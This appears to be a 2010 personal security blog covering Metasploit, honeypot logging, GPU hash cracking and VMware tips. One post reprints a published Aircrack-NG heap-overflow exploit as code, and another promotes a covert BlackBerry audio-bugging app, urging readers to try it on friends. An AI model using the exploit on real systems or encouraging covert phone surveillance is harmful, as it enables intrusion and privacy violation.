Monday, October 25, 2010

Look out

got Metasploit running on my iphone4 after a few tweaks..

Monday, October 18, 2010

Security B-Sides DFW Nov 6th

The very first B-Sides security conference in Dallas, TX is coming up Nov 6th and I will present early morning on mass exploitation using Metasploit a cucumber and an iPhone.

Please bring your friends and co-workers who are interested in Security as these conferences are completely free and typically loads of fun.

Hope to see you there, cheers.

Monday, September 6, 2010

Amun Honeypot with ArcSight CEF support

Playing around this weekend and created a CEF syslog output plugin for Amun honeypot, here is the sample output (dst IP scrubbed):

Sep 6 19:44:30 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=,dst=,msg=DCOM Vulnerability,dpt=135,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=,dst=,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=,dst=,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=,dst=,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=,dst=,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None

Now need to feed these into an ESM active list...

To be nice, I packaged up the CEF enabled Amun honeypot into a 200MB Ubuntu VM so you can try this out in your ArcSight lab or production. Follow the easy directions to re-IP and setup syslog out. You will be nabbing attackers and the latest malware in no time!

***update: I Googled the attacker IP's in the post above and found no mention of them in any open malicious IP lists, this highlights the effectiveness of using honeypots to gather the absolute latest intelligence on hosts attacking your perimeter (and others).

***update 2: VM boot issue fixed, sorry about that!

Saturday, August 28, 2010

MIT Courseware: Learn to program in Python

Just wanted to share this excellent resource as I have been mentoring new security professionals and a majority of them have never written a script before. Open course ware is one of the greatest things to come out in recent years and I understand this is one of the best intro programing lectures:

Thursday, August 12, 2010

ArcOSI - ArcSight Open Source Intelligence

Just in time for the ArcSight annual users conference I will be presenting on integrating Open Source Intelligence in ESM and have updated the original script with a version which can pull from multiple configurable sources!

If you want to give it a spin on your own environment now, download the python script version below and start streaming thousands of known malicious IP's right into ESM via CEF syslog.

usage: ./

Thursday, May 13, 2010

New 13" Macbook Pro GPU Hash Cracking NTLM/MD5/SHA1

Wanted give some GPU cracking a go on my new 13" Macbook Pro. It's sporting a nice but rather weak Nvidia Geforce 330m.

If you want to try the same, you will need the CUDA libraries here, and CUDA Multiforcer for Intel Mac's located here.

Remember to check out Pyrit here for cracking WPA/WPA2 keys, it will also run on OSX...

./CUDA-Multiforcer -h NTLM -c charsets/charsetfull -f test_hash_files/Hashes-NTLM-Full.txt --min=4 --max=9

Benchmark: CUDA Multiforcer (multiple hash brute forcer)
by Bitweasil
Version 0.61 beta, length 0-14
Currently supported hash types: MD5 MD4 NTLM
Hash type: NTLM
CUDA Device Information:
Device 0: "GeForce 320M"
Number of cores: 48
Clock rate: 0.00 GHz
Charset loaded (96 characters)
Hashes loaded (7 hashes)
Launching kernel for password length 4
Done: 73.49% Step rate: 82.9M/s Search rate: 580.4M/sec


Compute done: Reference time 1.3 seconds
Stepping rate: 63.1M MD4/s
Search rate: 441.8M NTLM/s

Launching kernel for password length 5
Done: 25.36% Step rate: 80.4M/s Search rate: 562.6M/sec

Wednesday, April 28, 2010

BlackBerry Evil

Asian security researcher known as "chopstick", released PhoneSnoop a freely available blackberry app that if installed will allow a remote computer to covertly call the blackberry, activate the speakerphone feature and allow remote audio bugging! Now this nasty little app was released at the Hack-n-a-Box security conference in Malaysia last October. It recently has shaken up government organizations such as US-CERT to issue warnings.

Remember in the news when President Obama had to fight to keep his blackberry after the election? This is a serious threat so try it out on your friends and get back to me.

Download it here and documentation here

A potential fix for enterprise blackberry users would be to deny "Input Simulation" option on the BES server.

Wednesday, April 14, 2010

Aircrack-NG remote exploit code

# Title: Remote Exploit Against the Aircrack-NG Tools svn r1675
# EDB-ID: 12217
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lukas Lueg
# Published: 2010-04-14
# Verified: no
# Download Exploit Code
# Download N/A

view source
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the
self-proclaimed length of a EAPOL-packet to be correct and never to exceed
a (arbitrary) maximum size of 256 bytes for packets that are part of the
EAPOL-authentication. We can exploit this by letting the code parse packets
a) proclaim to be larger than they really are, possibly causing the code
to read from invalid memory locations while copying the packet;
b) really do exceed the maximum size allowed and overflow data structures
allocated on the heap, overwriting libc's allocation-related
structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-
path. Careful layout of the packet's content can even possibly alter the
instruction-flow through the already well known heap-corruption paths
in libc. Playing with the proclaimed length of the EAPOL-packet and the
size and content of the packet's padding immediately end up in various
assertion errors during calls to free(). This reveals the possibility to
gain control over $EIP.

Given that we have plenty of room for payload and that the tools are
usually executed with root-privileges, we should be able to have a
single-packet-own-everything exploit at our hands. As the attacker can
cause the various tools to do memory-allocations at his will (through
faking the appearance of previously unknown clients), the resulting
exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev
r238 to work. It generates pcap-file with single packet of the following


03/27/2010, Lukas Lueg,

import cpyrit.pckttools
import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second
# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-
# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and
# struct WPA_hdsk.
# We have plenty of room for exploit-payload as most of the fields in the
# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent
# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in
# case of airodump-ng...
pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \
addr2='00:de:ad:c0:de:01', \
FCfield='to-DS') \
/ scapy.layers.dot11.LLC() \
/ scapy.layers.dot11.SNAP() \
/ scapy.layers.l2.EAPOL(len=65000) \
/ cpyrit.pckttools.EAPOL_Key() \
/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \
/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':
print "Packet's content:"
print ''.join("%02X" % ord(c) for c in str(pckt))
filename = 'aircrackng_exploit.cap'
print "Writing to '%s'" % filename
writer = cpyrit.pckttools.Dot11PacketWriter(filename)
print 'Done'

Thursday, March 25, 2010

Getting Synced

I have a personal Gmail account which activesync's Contacts, Mail and Personal Calendar. Problem is I have two other seperate work related calendars on a different system and they don't sync to my phone.

The first is my business Google Apps account where I receive lots of Calendar invites next I have my work laptop Outlook account which is critical but only while I am in this client's engagement.

So with all these various data sources I thought it may be too difficult to patch together all the Calendar and event sources into my single wimpy iPhone. It really wasn't that hard at all, read on:

Personal Gmail - Outlook Active Sync to "" (Sync Calendar, Contacts, Mail)

story: When Jess quit her job to move to a competitor she gave me a heads up about the company taking her blackberry, within 15 minutes and while driving :) we set her BB to bi-direction sync (just type into the BB browser and download app over the air). We then removed the sync app, wiped her contacts from the phone and repeat the process to pull down contacts onto her new BB. If you ever stress about losing your phone and contacts this is your best solution regardless of your phone choice.

Work Google Apps Account - This is standard IMAP connection to my iPhone, and an additional CalDAV account for syncing the additional calendar! This I did not think was possible until doing some research.

Client Outlook Account - Download the Windows Google Sync utility and set it up to PUSH from Outlook TO one of your Gmail accounts already on your phone, pick the one with the most potential conflicts then you can pull it up in the browser and re-arrange/re-schedule.

That's it, I will hopefully never be late to another meeting again! (yea right)

Tuesday, February 23, 2010

VMWare Fusion and OSX FileVault encryption

VMWare Fusion consistently having performance problems for me of late. I've cursed their name and thought ah well I will switch to Virtual Box or Parallels some time in the future. Just today it occurred to me that the default VM storage directory is within /User/Username home directory!

Why is that significant? I have (like many Mac wielding infosec folk) FileVault home folder encryption enabled, this combined with the option to encrypt swap memory enables obviously cripples the performance of resource intensive Virtualization.

The simple solution is to relocate the VM directories out of your home directory for example:

#sudo -s
#mkdir /vmware
#mv /User/Username/Documents/Virtual\ Machines.localized/ /vmware
#chown -R username:staff /vmware

*** Update *** this more than quadruples the speed of your VM's if you have filevault on.